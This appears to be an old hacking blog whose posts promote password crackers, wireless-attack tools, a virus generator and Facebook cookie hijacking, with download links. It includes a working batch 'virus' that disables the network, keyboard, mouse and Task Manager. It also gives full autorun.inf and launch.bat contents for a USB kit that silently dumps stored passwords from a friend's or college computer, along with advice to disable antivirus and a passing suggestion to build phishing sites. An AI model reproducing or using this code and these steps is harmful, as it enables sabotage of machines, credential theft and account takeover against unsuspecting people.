Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip.
Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in Internet Explorer go to tools, internet options, connections, settings. In the above proxies they are in the format host:port
Reply me if u like it.

How To Not Be A Noob Hacker In 7 Easy Steps

2010-03-13T15:02:00.001+05:30

1. Don't go posting stuff like, "How do I hack my friend's myspace?"
First, you want to search Google, and learn basics of things. Then you will understand what you have to do.

2. Don't call yourself a "1337 h4xx0r".
That just proves that you aren't anywhere close to being 1337, or l33t, or whatever you want to call it. Also, it proves to us that you're not a hacker, that you just want to be one. You think that code like this:
@echo off
:a
start
goto a
is the best virus on the planet.

3. Ask Google before asking anyone else.
Like I said in Step 1, you want to ask Google before you piss us off. If you can't find it on Google, then you probably weren't working hard enough.

4. Start out easy.
You want to learn things that are easier to learn first. If you're going to start with programming languages, I suggest u to learn easy things like HTML, FREEBasic, Python, and other basic languages. After you're done with the languages, start trying to make programs that can be useful for you. It doesn't matter what they are, simple things like a Paint program will do good.

5. Read lots of posts from other people.
If you read the posts of other people, you can learn a lot. If it is a bad post, then you learned what is probably a good posts vs. a bad post. Also read very good posts, so that you know what to expect from good posts. If you don't like reading, then you're probably not going to get far into computers.

6. Start learning harder things.
Now you can start learning harder languages, such as C++, java, php, and other advanced languages. Once you learn these languages, you can have lots of fun with them. You can make fun games with java, or make phishing sites through php. Just mess around with them for a while.

7. Just have fun!
Now you know a lot about computers. Just go and have fun with what you have learned. Start Exploiting, start administrating. Whatever suits your needs. Also, now that you know all of this, you can pretty much tackle anything with computers.
Reply me if u like this.
Thanx.

Creating a Simple Batch Virus

2010-03-13T15:01:00.001+05:30

This is a simple batch virus,
Just copy the code in notepad & save it as "whatever.bat" u can name the file whatever u want.

Disable Internet connection
@echo off
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all

Disable Keyboard
@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg" start nokeyboard.reg

Disable Mouse
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Disable Task manager
@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

"DON'T MESS UP!BE CAREFUL, I AM NOT THE HELL RESPONSIBLE"
Reply me if u like it
Thanx.

The World’s Fastest MD5 Cracker – BarsWF

2010-03-11T12:33:00.001+05:30

BarsWF is basically an MD5 cracking tool and at the moment, is currently the fastest. Right now on nVidia 9600GT/C2D 3Ghz CUDA version does 350 M keys/sec, SSE2 version does 108 M keys/sec. You may check benchmarks of all known good MD5 bruteforcers here.

Changes in 0.8

* Added checks for errors when calling CUDA kernel. * Now you can specify custom characters for charset using -X switch. * You may specify minimal password length using -min_len. * Save/restore feature added. State is being stored to barswf.save every 5 minutes or on exit. You may continue computation using -r switch. You may manually edit .save file to distribute job on several computers (but this is up to you – it is quite simple and non-documented ). BarsWF will also write found password into barswf.save at the end. * Improved speed for cards GTX260, GTX280, 8800GT, 9600GSO, 8800GS, 8800GTS – by approximately 10%, all other cards will get just 1-2%.

System Requirements

* CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory. * LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta) * CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom). * Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.

CUDA:
BarsWF CUDA x64
BarsWF CUDA x32

SSE2: BarsWF SSE x64
BarsWF SSE x32

Ophcrack Windows password cracker

2010-03-11T12:29:00.001+05:30

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

Changes:

* (feature) support of the new table set (alphanum + 33 special chars – WS-20k)

* (feature) easier configuration for the table set (tables.cfg)

* (feature) automatic definition of the number of tables to use at the same time (batch_tables) by queriying the system for the size of the memory

* (feature) speed-up in tables reading

* (feature) cleaning of the memory to make place for table readahead (linux version only)

* (feature) improved installer for windows version

* (fix) change of the default share for pwdump4 (ADMIN$)

Get it at


http://sourceforge.net/projects/ophcrack

GoldenEye (GoldEye) Password Cracker

2010-03-11T12:27:00.000+05:30

GoldenEye is a brute-force hacking program and was written for web-masters to test the security of their own sites. This is an oldskool file, a lot of people are still looking for this.

It should not be use by others to hack sites – this would be illegal! Under no circumstances should the author or any other persons involved in its development or distribution be held liable for the misuse of the program.

Once again these old files and tutorials are meant for the purpose of learning, test them in your own lab, see how they work, see what they do then try and write something similar yourself.

Notes

GoldenEye works with different types of wordlists:
"username:password", "username [TAB] password" or single lists

GoldenEye executes its attempts simultaneously. The number of simultaneous attempts can be adjusted with the speed slider on the “access” tab. You can also adjust the speed limit. On the Options|Connections tab you’ll find a box to set the “top-speed”; select an apropiate value. Use lower values for slow internet connection!

If you get to much timed-out connections, lower the crack speed or increase the TTL (time to life). Timed-out connections will be automatically resumed if you check ‘Resume time-out connections automatically’ on the same tab.

Note: The program is tested with 70 simultaneous request. If you choose a higher value, do it on your own risk! If GoldenEye tells you something about buffer problems, lower the speed next time. I’ve encountered that other running programs may cause buffer problems.

GoldenEye logs the cracked sites. They are listed on the History|Access History tab. You can select and delete single entries or the whole list. Expired combinations will be automatically removed when you click the check for expired passwords button. Click on the ‘visit button’ or double click on the selected url to launch it in your browser.

Access tab

The url box: if you don’t remember the members url you can
search through the list
or you type in a part off the url or a defined site name (see History|URL History) and click on the small button at the right end of the url-box.

Options|Advanced tab:
Change proxy after x attempts: GoldenEye changes the proxy automatically after x attempts if this options is checked.You have to use several proxies to use this feature. Add proxies on the Options|connections tab.GoldenEye changes the proxy randomly or in the order which is given by the proxy-list.
Server Response: the standard values are ‘200′ for ok and ‘401′ for access denied (unauthorized). If the server you’re attacking gives other reply numbers you can change them. Note: You can’t use 404 or 500!
Cookie: If the attacked server needs a cookie, check this option and enter the cookie string.
Referer: If the attacked server needs the url of the refering site, enter it here.

Wordlist tools tab
Remove dupes: New: If you’re using single lists for userID and password GoldenEye removes the dupes simultaneous.
General wordlist options:
Define a mininum and maximum length for the userID and password (standard settings 1-32)
Convert the list: All passes will be converted ‘on-the-fly’.
Wordlist style: If you want to use single lists: check this option.
Wordlist manipulations: this tab appears after you’ve loaded a list and checked the ‘Extend list’ on “General wordlist”

“Common manipulations” are predefined manipulations.
On the “Advanced” tab you can choose your own prefixes, suffixes, etc. If you miss something, tell me!

Security check
Server security test: It tests the attacked server for other security holes.
Proxy test: tests the proxy-speed. The values are in milliseconds.

CeWL – Custom Word List Generator Tool for Password Cracking

2010-03-11T12:26:00.000+05:30

This application is more towards creating custom word lists from a specific domain by crawling it for unique words. Basically you give the application a spidering target website and it will collect unique words. The application is written in Ruby and is called CeWL, the Custom Word List generator. The app can spider a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

IF you combine the info output by CeWL and AWLG with the standard wordlists for password cracking – you should have a fairly comprehensive set.

By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.

Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.

Installation

CeWL needs the rubygems package to be installed along with the following gems:

* http_configuration
* mime-types
* mini_exiftool
* rubyzip
* spider


http://www.digininja.org/files/cewl_2.0.tar.bz2

Wep0ff – Wireless WEP Key Cracker Tool

2010-03-11T12:23:00.002+05:30

Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.

It uses combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP-key recovery.

This tool can be used to mount fake access point attack against WEP-based wireless clients.

This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).

How to Use: 1. Setup fake AP with KARMA tools or iwconfig

iwpriv ath0 mode 2

iwconfig ath0 mode master essid foo enc 1122334455 channel 7

echo 1 > /proc/sys/dev/ath0/rawdev

echo 1 > /proc/sys/dev/ath0/rawdev_type

ifconfig ath0

up ifconfig ath0raw up

2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)

3. Wait until client connect to fake access point

4. Launch airodump-ng to collect packets

5. Launch aircrack-ng to recover WEP key


http://www.ptsecurity.ru/download/wepoff.tar.gz

inSSIDer – Wi-Fi network scanner For Windows

2010-03-11T12:21:00.000+05:30

inSSIDer is an award-winning free Wi-Fi network scanner for Windows Vista and Windows XP. Because NetStumbler doesn’t work well with Vista and 64-bit XP, we built an open-source Wi-Fi network scanner designed for the current generation of Windows operating systems.

What’s Unique about inSSIDer?

* Use Windows Vista and Windows XP 64-bit.
* Uses the Native Wi-Fi API.
* Group by Mac Address, SSID, Channel, RSSI and “Time Last Seen.”
* Compatible with most GPS devices (NMEA v2.3 and higher).

How can inSSIDer help me?

* Inspect your WLAN and surrounding networks to troubleshoot competing access points.
* Track the strength of received signal in dBm over time.
* Filter access points in an easy to use format.
* Highlight access points for areas with high Wi-Fi concentration.
* Export Wi-Fi and GPS data to a KML file to view in Google Earth

InSSIDer is licensed under the Apache License, Version 2.0. The source code is freely available from the public Subversion repository at http://www.metageek.net/svn/trunk.

Ncrack – Network Authentication Cracking Tool

2010-03-11T12:20:00.001+05:30

Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more.

Ncrack was started as a “Google Summer of Code” Project in 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software. It is released as a standalone tool, be sure to read the Ncrack man page to fully understand Ncrack usage.


Tarball:http://nmap.org/ncrack/dist/ncrack-0.01ALPHA.tar.gz
Windows Binary: http://nmap.org/ncrack/dist/ncrack-0.01ALPHA-setup.exe

Kismet – Wireless NetworkSniffing & Monitoring

2010-03-11T12:18:00.000+05:30

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic.

Features
Ethereal/Tcpdump compatible data logging
Airsnort compatible weak-iv packet logging
Network IP range detection
Built-in channel hopping and multicard split channel hopping
Hidden network SSID decloaking
Graphical mapping of networks
Client/Server architecture allows multiple clients to view a single
Kismet server simultaneously
Manufacturer and model identification of access points and clients
Detection of known default access point configurations
Runtime decoding of WEP packets for known networks
Named pipe output for integration with other tools, such as a layer3 IDS like Snort
Multiplexing of multiple simultaneous capture sources on a single Kismet instance
Distributed remote drone sniffing
XML output
Over 20 supported card types


https://www.kismetwireless.net/download.shtml

best Wireless Cracking Tools

2010-03-10T19:18:00.001+05:30

Most serious hackers and network auditors use the open-source operating system Linux as the platform from which they launch attacks and perform analysis. This section highlights some of the more popular tools, mostly Linux, that can be used to search out and hack wireless networks.
AirSnort

The home page for the free cracking application, AirSnort, plainly states, "AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys." AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. In even more simplistic terms, AirSnort is a program that listens to the wireless radio transmissions of a network and gathers them into a meaningful manner. After enough time has passed (sometimes in a matter of hours) and data are gathered, analytical tools process the data until the network security is broken. At that point everything that crosses the network can be read in plain text.

The authors of this fully functional encryption-cracking tool have maintained from the first days of release it would expose the true threats of WEP encryption. Jeremy Bruestle, one of two lead programmers for the project, has truly recognized the inherent dangers of WEP. He states during an interview in 2001, “It is not obvious to the layman or the average administrator how vulnerable 802.11b is to attack. It’s too easy to trust WEP.” AirSnort is not the only open-source tool used for wireless cracking but the first publicly recognized freeware to put the power of an intellectually skilled-criminal into the hands of a neighbor, who just got the cheapest deal from the local ISP.
WEPcrack

WEPcrack, simultaneously being developed along with AirSnort, is another wireless network cracking tool. It too exploits the vulnerabilities in the RC4 Algorithm, which comprise the WEP security parameters. While WEPcrack is a complete cracking tool, it is actually comprised of three different hacking applications all of which are based on the development language of PERL. The first, WeakIVGen, allows a user to emulate the encryption output of 802.11 networks to weaken the secret key used to encrypt the network traffic. Prism-getIV is the second application that will analyze packets of information until ultimately matching patterns to the one known to decrypt the secret key. Thirdly the WEPcrack application pulls the two other beneficial data outputs together to decipher the network encryption.
Kismet

Kismet is an extremely useful tool that supports more of an intrusion detection approach to the wireless security. However, Kismet can be used to detect and analyze access points within range of the computer on which it is installed. Among many other things, the software will report the SSID of the access point, whether or not it is using WEP, which channels are being used, and the range of IP addresses employed. Other useful features of Kismet include de-cloaking of hidden wireless networks, and graphical mapping of networks using GPS integration.
Ethereal

Ethereal is a pre-production network capturing utility. Currently capable of identifying and analyzing 530 different network protocols, Ethereal can pose a substantial threat through the discovery and detection of any network communication. One of many network analyzers, this application arguably does the most comprehensive job of seeing and recognizing everything that goes by its sensor.
Airjack

Known as a packet injection/reception tool, Airjack is an 802.11 device driver is designed to be used with a Prism network card (mainly Linux hardware). Other names include wlan-jack, essid-jack, monkey-jack, and kracker-jack. This tool was originally used as a development tool for wireless applications and drivers to capture, inject, or receive packets as they are transmitted. It’s a fundamental tool used in DoS attacks and Man-in-the-Middle attacks. Its capabilities include being able to inject data packets into a network to wreck havoc on the connections between wireless node and their current access point. A common hacking use for this tool is to kick everyone off of an access point immediately, and keep them logged off for as long as you like. Without the Layer-1, frame level authentication on all 802.11a/b/g networks, a computer running Airjack would passively assume the identity of an access point and then once inside of the channel of communication between node and AP, Airjack would begin sending dissociate or deauthenticate frames sequentially at a high rate. The users’ networks network cards interpret this as their AP and they drop their connection.
HostAP

HostAP is really nothing more than a firmware for Prism cards to act as an access point in any environment. With multiple scanning, broadcasting, and management options, HostAP can lure disconnected clients into a connection with the HostAP user’s computer and engage into whatever activities suitable to that situation. This is a very common tool used with growing compatibility where it will be ubiquitous with any Open Source OS in the near future.
Dweputils

Dweputils is not one application but a set of applications that together comprise a larger threat to wireless networks of any character. Dweputils is a set of utilities that can completely inspect and lock-down any WEP network. Dwepdump is a packet-gathering tool, which provides the ability to collect WEP encrypted packets. Dwepcrack then gives you the power to deduce WEP keys with a variety of frequently employed technique. Finally dwepkeygen, a 40-bit key generator, can creates keys that aren’t susceptible to the Tim Newsham 221 attack with a variable length seed.
AirSnarf

AirSnarf is an access point spoofing tool based off the simplest way to dupe users into handing over their sensitive information to rouge hackers. Quite simply this application mimics a legitimate access point. The method of attack is broken down into recreating an identical logon webpage that would normally be displayed by the AP. The user is bumped off the network and forced to re-login or is caught before they login the first time. The simple trick convinces them into voluntary sending their login information to the hacker who can then use it at their disposal. It is extremely simple yet effective.

All the details of the AP connection are legitimate to the unsuspecting user within their network configuration. They never realize this has happened in some cases as you then authenticate them to the network and allow them to pass through your computer.
NetStumbler

This is the primary tool available for Windows users to detect 802.11 networks. It does not have any cracking tools that are inherent in the software package but can be used in conjunction with numerous other tools to find and hack a wireless network. NetStumbler is perhaps the least dangerous application discussed here, but the first challenge of any hack is finding where and what you are hacking.
THC-RUT

Also referred to as the “aRe yoU There” network tool, THC-RUT, combines detection, spoofing, masking, and cracking into the same tool. Many see it as the, “first knife used on a foreign network” boasting its brute force all-in-one capabilities. Resources in the tool included spoofing Dynamic Host Configuration Protocol (DHCP), Reverse Address Resolution Protocol (RARP), and Bootstrap Protocol (BOOTP) requests.
Hotspotter

Hotspotter is another rouge access point tool that can mimic any access point, dupe users to connecting, and authenticate with the hacker’s tool. This, again, is done with a deauthenticate frame sent to a MS Windows XP user’s computer that would cause the victim’s wireless connection to be switched to a non-preferred connection, AKA a rouge AP. This sort of trick is a passive approach that seeks to identify the probe frame sent by any Windows XP machine looking for its preferred network containing exploitable information.
ASLEAP

LEAP stand for Lightweight Extensible Authentication Protocol, which is intellectual property of Cisco Systems, Inc. This is a broadly used protocol for authentication on Cisco Access points with inherent weaknesses. ASLEAP is able to use hashing algorithms to create brute force attacks to recover passwords, and actively deauthenticate users from the AP making them reauthenticate quickly to expedite the process of hacking. This is another tool in the arsenal of hackers with an ever-shrinking learning curve.
IKECrack

IKECrack is an open source IKE/IPSec authentication crack tool. It uses brute force dictionary based attacks searching for password and key combinations to Pre-Shared-Key (PSK) authentication networks. With repetitive attempts at authentication with random passphrases or keys this crack tool undermines the latest WiFi security protocol.

FacebookController – The Ultimate Utility to Control Facebook Accounts

2010-03-10T19:16:00.002+05:30

Just to put a downer on all the script kiddies, this utility WILL NOT hack/crack Facebook passwords or accounts.

You need to feed it biscuits (cookies) before you can do anything.

You can get the target’s cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, Scroogle search or however you like.

Once you have the cookies you can use FBController to have Full control over the target’s Facebook account.

Login to your Facebook account and sniff your own cookie OR collect a few live Facebook Biscuit/s of your Target/s.

Till now FBController version 1.0 uses your Target’s provided cookie and only :

A > Downloads the HomePage.
B > Allows you to Update the Target’s Wall and
C > Retrieve your Target’s Friend’s List

There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc.

FBConTroller was entirely written without knowing any of Facebook’s Dev API’s. Considering the above along with Facebook’s complexity, the next version might take some time to get released

You can download FBController here

http://hotfile.com/dl/32111826/78581b6/FBConTroller_by_freealldown.com.RAR.html

How to Hack Passwords Using USB Drive

2010-03-10T19:16:00.001+05:30

There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How to safeguard your files when computer crashes

2010-03-10T19:15:00.001+05:30

First thing to keep in mind: If your computer hasn’t crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:

1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.

2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.

3) Don’t install software that would do dangerous things to your hard drive. A boot manager would fall in this category.

4) Use a registry cleaner before and after you install or uninstall any software. Many of the problems that will keep Windows from booting are caused by sloppy software that mess up your registry. A good registry cleaner is Tune-up Utilities. Code: http://www.tune-up.com/

5) Run chkdsk now and then. Go to Start> Run. Type chkdsk /F. Press enter.

In case your PC has already crashed, read the following:

Most important: Don’t panic! Panic is like a little demon that whispers in your ear to format your hard drive and reinstall everything. Don’t do it! You will lose all your data and the little demon will laugh at you.

To be exact you can still recover your data if you format your drive (by using special software), but only if you don’t write anything on the disc afterwards. In other words format + windows install = bad idea. If you reinstall windows without formating your drive, you will only lose the files on your desktop and "My Documents" folder.

In all occasions you should make sure to safeguard your files before attempting any kind of repair!

So let’s go about how to do that:

The fast way: Go to this site: Code: http://www.knoppix.org . Knoppix is a Linux distribution than runs from a CD. Download the Knoppix ISO and burn it. Put it in your CD drive. On startup access BIOS and change the boot sequence so that your computer boots from the CD drive. Save settings and exit. Upon reboot, Knoppix will load.

Knoppix is much like windows and it comes with its own CD burner. Locate it, launch it and backup everything you want on CD. Now you don’t have to worry anymore!

The less fast way: This requires that you have access to a second PC. Open the case of your computer and remove the hard disk.

Install it as a slave on the second PC.

Depending on respective configurations, you may have to change some jumper settings on the drive. Read the manual for help with installing hard drives and setting jumpers.

After this is done, boot the second PC. If everything went out ok, you should be able to access your drive without problems. (Edit: Note that Win98 cannot recognize a local NTFS (Win2K/XP) disk.)

Copy everything you need from your own hard drive to the other one. Now you don’t have to worry anymore!

Replace your computer’s hard disk, fix all problems and reverse the process to copy the data back to your computer, or take CD backups on the other PC.

Virus-O-Matic Virus Generator

2010-03-10T18:49:00.002+05:30


http://hotfile.com/dl/32111225/d679263/Atomics_Virus_Creator_V.65_byr_freealldown.com.zip.html

password:- freealldown.com